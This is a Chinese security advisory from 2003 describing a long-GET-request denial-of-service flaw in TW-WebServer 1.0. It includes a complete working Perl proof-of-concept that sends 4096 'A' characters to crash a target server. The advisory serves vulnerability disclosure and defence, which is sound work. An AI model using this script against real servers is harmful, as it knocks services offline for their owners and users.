安全研究

安全漏洞
TW-WebServer远程拒绝服务攻击漏洞

发布日期:2003-04-16
更新日期:2003-04-28

受影响系统:
Twilight Utilities TW_WebServer 1.0
描述:
BUGTRAQ  ID: 7368

TW-WebServer是一款集成多种功能的WEB服务程序,支持WEB视频,发送文件,自动生成WEB页等。

TW-WebServer对用户提交的超长HTTP GET请求缺少正确处理,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。

攻击者只要简单的提交包含4096个字符以上的GET /请求,就可以导致WEB服务程序挂起,精心提交请求字符串可能以WEB权限在系统上执行任意指令。

<*来源:badpack3t (badpack3t@security-protocols.com
  
  链接:http://lists.virus.org/full-disclosure-0304/msg00208.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

badpack3t (badpack3t@security-protocols.com)提供了如下测试方法:

#!/usr/bin/perl
#
# Twilight Utilities TW-WebServer/1,3,2,0
#
# Vulnerable systems:
# TW-WebServer/1, 3, 2, 0
#
# Written by badpack3t <badpack3t@security-protocols.com>
# For SP Research Labs
# 04/15/2003
#
# www.security-protocols.com
#
# usage:
# perl sp-urfuqed.pl <target> <port>
#
# big ups 2: acidjazz, #havoc, regulate, cr0wn, mp, lopt,
# aitek5, rab, #darknet, dvdman, bind, and whoever the f else.

use IO::Socket;
use strict;

print ".:."x 20; print "\nTW-WebServer/1, 3, 2, 0 DoS, <badpack3t\@security-protocols.com>\n";
print ".:."x 20; print "\n\n";

if(!defined($ARGV[0] && $ARGV[1]))
{
   &usage;
}

my $host     = $ARGV[0];
my $def      = "A";
my $num         = "4096";
my $port     = $ARGV[1];
my $urfuqed  = $def x $num;

my $tcpval   = getprotobyname('tcp');
my $serverIP = inet_aton($host);
my $serverAddr = sockaddr_in($ARGV[1], $serverIP);
my $protocol_name = "tcp";

my $iaddr    = inet_aton($host)        || die ("host was not found: $host");
my $paddr    = sockaddr_in($port, $iaddr)  || die ("you did something wrong stupid... exiting...");
my $proto    = getprotobyname('tcp')       || die ("cannot get protocol");
socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die ("socket could not open: $host");
connect(SOCK, $paddr)                || die ("cannot connect to: $host");

my $submit   = "GET $urfuqed HTTP/1.0\r\n\r\n";  
send(SOCK,$submit,0);
close(SOCK);

sub usage {die("\n\nUsage: perl $0 <target_host> <port>\n\n");}

print "\n.:.:.:.:.:.:.:.:.:.:.:.";
print "\ncrash was successful ~!\n";
print "\.:.:.:.:.:.:.:.:.:.:.:.\n";

建议:
厂商补丁:

Twilight Utilities
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.twilightutilities.com

浏览次数:2721
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障